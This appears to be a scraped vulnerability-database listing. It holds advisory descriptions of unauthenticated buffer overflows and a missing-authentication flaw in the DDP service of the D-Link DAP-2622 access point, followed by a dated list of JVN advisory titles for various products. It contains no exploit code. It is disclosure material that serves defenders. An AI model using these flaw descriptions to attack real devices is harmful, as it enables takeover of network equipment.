| var-202308-3319 | D-Link DAP-2622 DDP Set SSID List Missing Authentication Vulnerability. This vulnerability allows network-adjacent attackers to make unauthorized changes to device configuration on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to manipulate wireless authentication settings. Was ZDI-CAN-20104. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company. No detailed vulnerability details are currently provided |
| var-202308-3121 | D-Link DAP-2622 DDP Reboot Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20054. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company |
| var-202308-3323 | D-Link DAP-2622 DDP Change ID Password Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20060. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company |
| var-202308-3219 | D-Link DAP-2622 DDP Change ID Password New Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20063. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company |
| var-202308-3185 | D-Link DAP-2622 DDP Configuration Backup Filename Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20068. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company |
| var-202308-3150 | D-Link DAP-2622 DDP Change ID Password New Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20062. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company |
| var-202308-3131 | D-Link DAP-2622 DDP Reset Factory Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20059. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company |
| var-202308-3120 | D-Link DAP-2622 DDP Configuration Backup Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20064. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company |
| var-202308-3106 | D-Link DAP-2622 DDP Reset Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20056. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company |
| ID | Description | Publish Date | Update Date |
|---|---|---|---|
| jvndb-2024-014793 | Multiple vulnerabilities in FXC AE1021 and AE1021PE | 2024-12-16T11:51+09:00 | 2024-12-16T11:51+09:00 |
| jvndb-2024-014079 | Trend Micro Deep Security Agent for Windows and Deep Security Notifier on DSVA vulnerable to OS command injection | 2024-12-06T12:11+09:00 | 2024-12-06T12:11+09:00 |
| jvndb-2023-000085 | "Skylark" App fails to restrict custom URL schemes properly | 2023-08-24T13:34+09:00 | 2024-12-03T15:51+09:00 |
| jvndb-2024-000124 | Multiple vulnerabilities in UNIVERGE IX/IX-R/IX-V series routers | 2024-12-02T16:38+09:00 | 2024-12-02T16:38+09:00 |
| jvndb-2024-000123 | Multiple FCNT Android devices vulnerable to authentication bypass | 2024-11-29T15:30+09:00 | 2024-11-29T15:30+09:00 |
| jvndb-2024-013702 | Multiple vulnerabilities in FUJI ELECTRIC products | 2024-11-29T14:42+09:00 | 2024-11-29T14:42+09:00 |
| jvndb-2024-002831 | ELECOM wireless LAN routers vulnerable to OS command injection | 2024-02-22T08:15+09:00 | 2024-11-27T14:45+09:00 |
| jvndb-2024-000122 | HAProxy vulnerable to HTTP request/response smuggling | 2024-11-27T14:36+09:00 | 2024-11-27T14:36+09:00 |
| jvndb-2024-003025 | Multiple vulnerabilities in ELECOM wireless LAN routers | 2024-03-27T14:26+09:00 | 2024-11-27T14:34+09:00 |
| jvndb-2024-012461 | Multiple vulnerabilities in SoftBank Mesh Wi-Fi router RP562B | 2024-11-13T14:26+09:00 | 2024-11-26T16:11+09:00 |
| jvndb-2024-000020 | Multiple vulnerabilities in ELECOM wireless LAN routers and wireless LAN repeater | 2024-02-20T14:14+09:00 | 2024-11-26T15:26+09:00 |
| jvndb-2024-000088 | Multiple vulnerabilities in ELECOM wireless LAN routers and access points | 2024-08-27T14:40+09:00 | 2024-11-26T15:17+09:00 |
| jvndb-2024-000121 | WordPress Plugin "WP Admin UI Customize" vulnerable to cross-site scripting | 2024-11-26T13:57+09:00 | 2024-11-26T13:57+09:00 |
| jvndb-2024-013260 | Multiple vulnerabilities in Edgecross Basic Software for Windows | 2024-11-22T10:59+09:00 | 2024-11-22T10:59+09:00 |
| jvndb-2024-000106 | Multiple vulnerabilities in AIPHONE IX SYSTEM, IXG SYSTEM, and System Support Software | 2024-10-21T11:58+09:00 | 2024-11-21T11:37+09:00 |
| jvndb-2024-000120 | "Kura Sushi Official App Produced by EPARK" for Android uses a hard-coded cryptographic key | 2024-11-20T13:56+09:00 | 2024-11-20T13:56+09:00 |
| jvndb-2024-000119 | Multiple vulnerabilities in FitNesse | 2024-11-15T13:37+09:00 | 2024-11-20T11:18+09:00 |
| jvndb-2024-012941 | Multiple vulnerabilities in Rakuten Turbo 5G | 2024-11-19T10:41+09:00 | 2024-11-19T10:41+09:00 |
| jvndb-2024-000118 | WordPress Plugin "VK All in One Expansion Unit" vulnerable to cross-site scripting | 2024-11-13T13:50+09:00 | 2024-11-13T13:50+09:00 |
| jvndb-2024-009481 | Insecure initial password configuration issue in SEIKO EPSON Web Config | 2024-10-01T14:14+09:00 | 2024-11-12T10:25+09:00 |
| jvndb-2024-000109 | baserCMS plugin "BurgerEditor" vulnerable to directory listing | 2024-10-10T14:57+09:00 | 2024-11-06T14:45+09:00 |
| jvndb-2024-012017 | Trend Micro Deep Security 20 Agent for Windows vulnerable to improper access control | 2024-11-06T11:00+09:00 | 2024-11-06T11:00+09:00 |
| jvndb-2024-011833 | Incorrect authorization vulnerability in OMRON Sysmac Studio | 2024-11-05T15:29+09:00 | 2024-11-05T15:29+09:00 |
| jvndb-2024-011747 | Command injection vulnerability in Trend Micro Cloud Edge | 2024-11-01T14:28+09:00 | 2024-11-01T14:28+09:00 |
| jvndb-2024-011744 | REST-APIs unintentionally enabled in Century Systems FutureNet NXR series routers | 2024-11-01T13:49+09:00 | 2024-11-01T13:49+09:00 |
| jvndb-2024-000116 | Hikvision network camera security enhancement to prevent cleartext transmission of Dynamic DNS credentials | 2024-10-30T15:07+09:00 | 2024-10-30T15:07+09:00 |
| jvndb-2024-011256 | Multiple vulnerabilities in Sharp and Toshiba Tec MFPs | 2024-10-28T17:33+09:00 | 2024-10-28T17:33+09:00 |
| jvndb-2024-000115 | Chatwork Desktop Application (Windows) uses a potentially dangerous function | 2024-10-28T14:29+09:00 | 2024-10-28T14:29+09:00 |
| jvndb-2024-000112 | MUSASI version 3 performing authentication on client-side | 2024-10-18T14:40+09:00 | 2024-10-25T16:55+09:00 |
| jvndb-2024-000113 | N-LINE vulnerable to HTML injection | 2024-10-18T14:48+09:00 | 2024-10-25T16:48+09:00 |